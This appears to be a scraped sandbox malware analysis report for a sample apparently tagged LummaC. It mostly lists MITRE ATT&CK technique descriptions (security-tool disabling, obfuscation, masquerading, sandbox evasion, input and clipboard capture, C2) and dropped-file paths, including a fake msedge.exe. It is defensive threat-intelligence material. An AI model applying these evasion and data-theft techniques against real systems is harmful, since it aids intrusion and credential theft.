Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4tXm5yPtiy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Edge\61a52ddc9dd915

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

C:\Edge\msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Users\user\AppData\Local\6720a68e0fd3fa

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Windows Analysis Report
4tXm5yPtiy.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre